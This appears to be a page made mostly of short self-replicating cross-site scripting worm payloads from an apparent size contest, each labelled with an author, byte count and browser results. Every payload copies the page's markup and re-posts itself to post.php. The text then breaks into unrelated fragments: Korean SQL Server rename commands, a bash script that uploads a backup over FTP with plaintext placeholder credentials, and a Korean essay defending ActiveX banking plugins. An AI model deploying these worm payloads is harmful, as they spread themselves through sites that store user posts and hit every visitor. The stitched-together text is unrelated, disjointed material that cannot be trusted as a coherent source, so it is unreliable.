<form><input name="content" onblur="submit(action=method='post',value='<form>'+parentNode.innerHTML.slice(alert('xss'),128))">
.mario - 171 Works in FF with no growth and works in IE and actually shrinks!!!
<b><img onerror="alert('xss');with(i)content.value=parentNode.innerHTML.bold(),submit()" src="m"><form id="i" action="post" method="post"><input name="content"></form></b>
bwb labs - 271 Works in both FF with no growth and IE!!!
<img src='' alt="alert('XSS');var x=new XMLHttpRequest;x.open('post','post.php');x.setRequestHeader('Content-Type','application/x-www-form-urlencoded');x.send('content='+encodeURIComponent('<img src=\'\' alt=\x22'+alt+'\x22 onerror=\'eval(alt)\'>'))" onerror='eval(alt)'>
barbarianbob (via ma1) - 127 Requires user interaction
<form<input name="content" onblur="submit(action=(method='post')+'.php',value='<form'+form.innerHTML.slice(alert('xss'),122))">
spyware - 140 Requires user interaction
ý<form action="post.php" method="post"><input name="content" onclick="alert('xss');value=body.innerHTML.match(/ý.*/);" type="submit"></form>
hallvors - 150 Doesn't work in Firefox 2.0.0.11
<iframe src="javascript:alert('XSS');with(new top.XMLHttpRequest){open('post','post.php');send('content=<iframe src=\x22'+frameElement.src+'\x22>')}">
hallvors - 185 Doesn't work in Firefox 2.0.0.11
<iframe src="javascript:alert('XSS');onload=function(){f[0].value='<iframe src=\x22'+frameElement.src+'\x22>';f.submit()};'<form method=post action=post.php id=f><input name=content>'">
shawn (via ma1) - 128 Requires user interaction
<form><input name="content" onblur="submit(action=(method='post')+'.php',value='<form>'+form.innerHTML.slice(alert('XSS'),122))">
bwb labs - 266 Works in FF with no growth and IE!!!
<script>eval(y="alert('XSS');q=String.fromCharCode(34);(x=new XMLHttpRequest()).open('POST','post.php');x.setRequestHeader('Content-Type','application/x-www-form-urlencoded');x.send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>
spyware - 134 Requires user interaction
ý<form method="post" action="post.php"><input name="content" onfocus="value=body.innerHTML.match(/ý.*/);alert('xss');submit()"></form>
ma1 - 129 Requires user interaction
<form><input name="content" onfocus="submit(action=(method='post')+'.php',value='<form>'+form.innerHTML.slice(alert('XSS'),123))">
ma1 - 136 Requires user interaction
<form><input name="content" onfocus="submit(action=(method='post')+'.php',value='<form>'+parentNode.innerHTML.slice(alert('xss'),132))">
spyware - 134 Requires user interaction
<form method="post" action="post.php"><input name="content" onfocus="value=body.innerHTML.match(/<f.*/);alert('xss');submit()"></form>
sdc (via shawn) - 143 Doesn't work in Firefox 2.0.0.11
<form><INPUT name="content"><IMG src="" onerror="with(parentNode)submit(action=(method='post')+'.php',_[0].value='<form>'+innerHTML.slice(alert('XSS'),152))">
shawn - 153 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',_[0].value='<form id=_>'+innerHTML.slice(alert('XSS'),146))</script>
spyware - 151 Requires user interaction
<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML.match(/<f.*/);alert('xss');submit()"></form>
sdc - 150 Requires user interaction
<b><form method="post" action="post.php"><input name="content" onfocus="submit(value=parentNode.parentNode.innerHTML.bold(),alert('xss'))"></form></b>
spyware - 137 Requires user interaction
<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML;alert('xss');submit()"></form>
sdc - 164 Doesn't work in Firefox 2.0.0.11
<script>function f(){alert("XSS");(x=new XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>"+f+"f()</"+"script>"));}f()</script>
sdc - 141 Doesn't work in Firefox 2.0.0.11
<script>function w(){alert("xss");(n=new XMLHttpRequest).open("post","post.php");n.send("content=<script>("+w+"())</"+"script>")}w()</script>
spyware - 122 Requires user interaction
<form method=POST action=post.php><INPUT NAME=content onFocus=content.value=document.body.innerHTML;alert('xss');submit()>
shawn - 153 Doesn't work in Firefox 2.0.0.11
<form id=_><input name=content id=c><script>with(_)submit(action=(method='post')+'.php',c.value='<form id=_>'+innerHTML.slice(alert('XSS'),146))</script>
amado - 140 Doesn't work in Firefox 2.0.0.11
<script>(function w(){alert("xss");n=new XMLHttpRequest;n.open("post","post.php");n.send("content=<script>("+w+"())<\/script>")}())</script>
sdc - 155 Doesn't work in Firefox 2.0.0.11
<form><input name="content"><script>with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),146))</script>
ma1 - 156 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',content.value='<form id=_>'+innerHTML.slice(alert('XSS'),147))</script>
ma1 - 156 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>with(_)alert('XSS',submit(content.value='<form id=_>'+innerHTML.slice(action=(method='post')+'.php',147)))</script>
ma1 - 161 Works in FF with no growth then shrinks and then regrows to the same size in IE7.0!!!
<form><input name="content"><img src="" onerror="with(parentNode)alert('XSS',submit(content.value='<form>'+innerHTML.slice(action=(method='post')+'.php',155)))">
dev80 - 159 Doesn't work in Firefox 2.0.0.11
<script>function p() {alert("xss");x=new XMLHttpRequest;x.open("post","post.php");x.send("content=<script>" + p.valueOf() + "p()<\/script>");}p()</script>
sdc - 161 Works in FF with no growth then shrinks and then regrows to the same size in IE7.0!!!
<form><INPUT name="content"><IMG src="" onerror="with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),155))">
ma1 - 164 (works with opera and safari also) Works in FF with no growth then shrinks and then regrows to the same size in IE7.0!!!
<form><INPUT name="content"><IMG src="/" onerror="with(parentNode)alert('XSS',submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(0,158)))">
ma1 - 163 Works in FF with no growth then shrinks and then regrows to the same size in IE7.0!!!
<form><INPUT name="content"><IMG src="" onerror="with(parentNode)alert('XSS',submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(0,157)))">
sdc (via dev80) - 142 Doesn't work in Firefox 2.0.0.11
<script>function p(){with(XMLHttpRequest)open("post","past.php"),send("content=<script>"+p.valueOf(alert('xss'))+"p()<\/script>")}p()</script>
dev80 - 145 Doesn't work in Firefox 2.0.0.11
<script>function p() {x=new XMLHttpRequest;x.open("post","past.htm");x.send("content=<script>" + p.valueOf() + "p()<\/script>");}p()</script>
ma1 (via sdc) - 158 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>with(_)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=_>'+innerHTML.slice(0,148)))</script>
barbarianbob - 171 Works in FF with no growth but doesn't work in IE7.0
<b><form id="f"><input name="content"><img src="" onerror="with(f)submit(alert('xss'),content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php')"></form></b>
sdc - 145 Doesn't work in Firefox 2.0.0.11
<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML))</SCRIPT>
sdc (via ronald) - 103 Grows
<input name="content"><script>i.content.value=document.body.innerHTML+alert('xss');i.submit();</script>
sdc (via spyware) - 159 Doesn't work in Firefox 2.0.0.11
<form method="POST" name="content" action="post.php"><img src="." onError="content.value=document.content.innerHTML+alert('xss');javascript:content.submit();">
spyware - 149 Doesn't work in Firefox 2.0.0.11
<form method=POST name=content action=post.php <img src=. onError=content.value=document.content.innerHTML+alert('xss');javascript:content.submit();>
ronald - 142 Grows
<form method=post action=post.php name=i><input name=content><script>i.content.value=document.body.innerHTML+alert('xss');i.submit();</script>
ronald - 139 Grows
<form method=post action=post.php name=i><input name=content><script>i.content.value=document.i.innerHTML+alert('xss');i.submit();</script>
ronald - 142 Grows
<form method=post action=post.php name=i><input name=content><script>content.value=document.body.i.innerHTML+alert('xss');i.submit();</script>
spyware - 116 Doesn't work in Firefox 2.0.0.11
<form name=o action=post.php <img src=. onError=o.value=document.body.innerHTML+alert('xss');javascript:o.submit();>
gareth - 229 Doesn't work in Firefox 2.0.0.11 (double encoded)
<script>(function(){alert('XSS');document.write('<form method=post action=post.php><input type=image onerror="form.submit()" src><input value='+escape('<script>('+arguments.callee+')()</scr'+'ipt>')+' name=content>')})()</script>
gareth - 206 Doesn't work in Firefox 2.0.0.11
<script>(function(){alert('XSS');with(document)write('<form method=post action=post.php><input value='+escape('<script>('+arguments.callee+')()</scr'+'ipt>')+' name=content>'),forms[0].submit()})()</script>
Ronald - 139 Grows
<form method=post action=post.php name=i><input name=content><script>content.value=document.body.innerHTML+alert('xss');i.submit();</script>
gareth - 164 Doesn't work in Firefox 2.0.0.11 (double encoded)
<form><input name=content type=image onerror="with(form)action=(method='post')+'.php',i=escape('<form>'+innerHTML);value=i;type='hidden';alert('XSS');submit()" src>
ronald - 119 Grows
<form name="i"><input name="content"><marquee onstart="content.value=document.body.innerHTML+alert('xss');i.submit();">
ronald - 107 Grows
<form name=content><marquee onstart="content.value=document.body.innerHTML+alert('xss');content.submit();">
gareth - 167 Doesn't work in Firefox 2.0.0.11 (double encoded) if you remove escape it shrinks, but does not work in IE7.0
<form><input name=content type=image onerror="f=form;i=f.innerHTML;type='hidden';alert('XSS');f.action=(f.method='post')+'.php';value=escape('<form>'+i);submit()" src>
gareth - 222 Doesn't work in Firefox 2.0.0.11 (double encoded)
<form><input name=content type=image onerror="f=this.form;i=f.innerHTML.replace(/(.*)/,'<form>$1</form>');this.type='hidden';alert('XSS');f.action='post.php';f.method='post';f.content.value=escape(i);submit()" src=></form>
spikeman - 143 Doesn't work in Firefox 2.0.0.11
<form id=z><input name=content><script>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML))</script>
ronald - 81 Grows
<script>f.content.value=document.body.innerHTML+alert("xss");f.submit();</script>
bwb labs - 168 Doesn't work in Firefox 2.0.0.11
<script>f=function(){alert("XSS");(x=new XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>f="+f+";f()</sc"+"ript>"));};f()</script>
bwb labs - 193 Doesn't work in Firefox 2.0.0.11
<script>eval(y="alert('XSS');q=String.fromCharCode(34);(x=new XMLHttpRequest()).open('POST','post.php');x.send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>
sdc - 145 Doesn't work in Firefox 2.0.0.11
<form id=z><input name="content"><script>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML))</script>
sdc - 159 Doesn't work in Firefox 2.0.0.11
<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML.substr(0,148)))</SCRIPT>
ritz - 162 Works in FF with no growth but does not work in IE7.0
<form><input name="content" src="" onerror="alert('xss');p=form;p.action=(p.method='post')+'.php';value='<form>'+p.innerHTML.substr(0,155);click()" type="image">
sdc (barbarianbob) - 178 Works in FF with no growth but stops working in IE7.0 after first iteration
<b><form action="post.php" method="post"><img src="." onerror="alert('xss');with(parentNode)content.value=parentNode.innerHTML.bold(),submit()"><input name="content"></form></b>
barbarianbob - 165 Grows
<b<form action=post.php method=post><img src=. onerror=alert('xss');with(parentNode)content.value=parentNode.innerHTML.bold(),submit()><input name=content></form</b>
ritz - 176 Doesn't work in Firefox 2.0.0.11
<b><img onerror="alert('xss');with(nextSibling)content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php',submit()" src="">
<form><input name="content"></form></b>
ma1 - 181 Works in FF with no growth and shrinks in IE7.0!!!
<b><img onerror="alert('xss');with(this.nextSibling)content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php',submit()" src=""><form><input name="content"></form></b>
ritz - 187 Works in FF with no growth and shrinks in IE7.0!!!
<b><img src="." onerror="alert('xss');with(this.nextSibling)firstChild.value=parentNode.innerHTML.bold(),submit()"><form method="post" action="post.php"><input name="content"></form></b>
ritz - 181 Doesn't work in Firefox 2.0.0.11
<b><img src="." onerror="alert('xss');with(this.nextSibling)firstChild.value=parentNode.innerHTML.bold(),submit()">
<form method=post action=post.php><input name=content></form></b>
.mario - 166 Doesn't work in Firefox 2.0.0.11
<b<img src=m onerror=alert('xss');with(nextSibling)content.value=parentNode.innerHTML.bold(),submit()><form method=post action=post.php><input name=content></form</b
ma1 - 173 Grows
<b><form method=post action=post.php><img src=. onerror=alert('xss');with(this.parentNode)content.value=parentNode.innerHTML.bold(),submit()><input name=content></form></b>
bwb labs - 188 Works in FF with no growth and shrinks in IE7.0!!!
<b><img onerror="alert('xss');n=(m=this.parentNode).lastChild;n[0].value='<b>'+m.innerHTML+'</b>';n.submit()" src=""><form action="post.php" method="post"><input name="content"></form></b>
ma1 - 174 Grows
<b><img src=. onerror=alert('xss');with(this.nextSibling)content.value=parentNode.innerHTML.bold(),submit()><form method=post action=post.php><input name=content></form></b>
ritz - 191 Grows
<s><img src=. onerror="alert('xss');f=this.nextSibling;f.firstChild.value='<s>'+this.parentNode.innerHTML+'</s>';f.submit()">
<form method=post action=post.php><input name=content></form></s>
arantius - 178 Breaks DOM knowledge rule
<p><form method=post action=post.php><input name=content><script>alert('XSS');F=document.forms;f=F[F.length-1];
f.content.value='<p>'+f.parentNode.innerHTML;f.submit();</script>
barbarianbob - 185 Grows
<b><img src onerror="alert('xss');n=(m=this.parentNode).lastChild;n.content.value='<b>'+m.innerHTML+'</b>';n.submit()"
<form method=post action=post.php><input name=content></form></b>
ritz - 194 Grows
<i><img src=. onerror="alert('xss');(f=(this.nextSibling)).firstChild.value='<i>'+this.parentNode.innerHTML+'</i>';f.submit()">
<form method=post action=post.php><input name=content></form></i>
.mario - 150 Grows
<form method=post action=post.php><img src=x onerror=i=this.parentNode;i.lastChild.value=i.parentNode.innerHTML;i.submit()><input name=content></form>
ritz - 196 Doesn't work in Firefox 2.0.0.11
<i><img src="/" onerror="alert('xss');(f=(this.nextSibling)).firstChild.value='<i>'+this.parentNode.innerHTML+'</i>';f.submit()">
<form method=post action=post.php><input name=content></form></i>
ritz - 195 Doesn't work in Firefox 2.0.0.11
<i><img src="/" onerror=alert('xss');(f=(this.nextSibling)).firstChild.value='<i>'+this.parentNode.innerHTML+'</i>';f.submit()">
<form method=post action=post.php><input name=content></form></i>
matt preston - 223 Doesn't work in Firefox 2.0.0.11
<script>alert('XSS');a='<scr'+'ipt>'+arguments.callee+'()</scr'+'ipt>';document.write('<form method=post action=post.php name=f><input value='+encodeURI(a)+' name=content></form>');body.onload=function(){document.f.submit()}</script>
gareth - 265 Doesn't work in Firefox 2.0.0.11
<script>function(){alert('XSS');a='<scr'+'ipt>'+arguments.callee+'()</scr'+'ipt>';document.write('<form method=post action=post.php name=f><input value='+encodeURIComponent(a)+' name=content></form>');this.onload=function(){document.f.submit()}}()</script>
digi7al64 - 266 Doesn't work in Firefox 2.0.0.11
<p id=e><script>alert('xss');var d=document;s='script>';p='<form method=post name=f action=post.php><input name=content value="+escape("<p id=e>"+d.getElementById(\'e\').innerHTML+"</p>")+"></form><'+s+'d.f.submit();</'+s;p='d.write("'+p+'");'; eval(p);</script></p>
--현재서버이름확인
select @@SERVERNAME
--현재서버이름삭제
exec sp_dropserver 'WIN-W5K3Z4VQN2M\SQL2005'
--변경한서버이름등록
exec sp_addserver @server ='WIN2008\SQL2005', @local ='local'
--SQL Server 재시작필요
--변경된서버이름확인
select @@SERVERNAME
#!/bin/bash
dstring="backup_`date +'%y%m%d'`.tar.gz"
/etc/init.d/network stop
tar cfz $dstring "/home/vpopmail/domains/domain.kr"
/etc/init.d/network start
Server="1.1.1.1"
UsrID="asdf"
Password="asdf"
ftp -n $Server <<End-Of-Session
user $UsrID $Password
binary
put "$dstring"
bye
End-Of-Session
# rm -f $dstring
많은 분들이 인터넷 뱅킹을 할 때 ActiveX가 설치되는 것에 대해 반감을 가지고 있는 것을 잘 알고 있습니다. 하지만 단지 그 때문에 오픈웹이 주장하는 바를 맹목적으로 따라가시면 곤란합니다. 현재의 보안 기술은 그럴만한 이유가 다 있었기 때문에 만들어진 것인데, 전후사정 따져보지도 않고 ActiveX는 악마의 기술인 것처럼 매도하시면 곤란합니다.
여러분의 계좌에 들어있는 몇 백만원, 몇 천만원이 중요합니까, 아니면 인터넷 뱅킹의 불편함을 제거하는 것이 중요합니까? 지금까지 무수한 노력과 헌신으로 여러분의 보안을 지켜온 보안 관계자들은 오픈웹이 보안 회사를 무슨 악의 축이라도 되는 것처럼 영혼과 양심을 팔아먹었다고 매도하는 것에 대해 분노하고 있으며, 그 무리한 주장에 우려를 금치 못하고 있습니다.
오픈웹은 보안 업계를 적으로 돌리고 싸울 것이 아니라, 현재 보안 관계자들이 오픈웹이 내세운 대안에 대해 언급하고 있는 문제점들을 다시 분석하고 받아들여서 현실적인 개선 방안을 강구해야 할 것입니다.
아무 생각없이 오픈웹의 주장에 동조할 것이 아니라, 아래의 링크들을 찬찬히 읽어보시고 냉정하게 다시 생각해보시기 바랍니다. 하단의 링크는 계속 업데이트 됩니다.
---------------------------------------------------
뜨겁네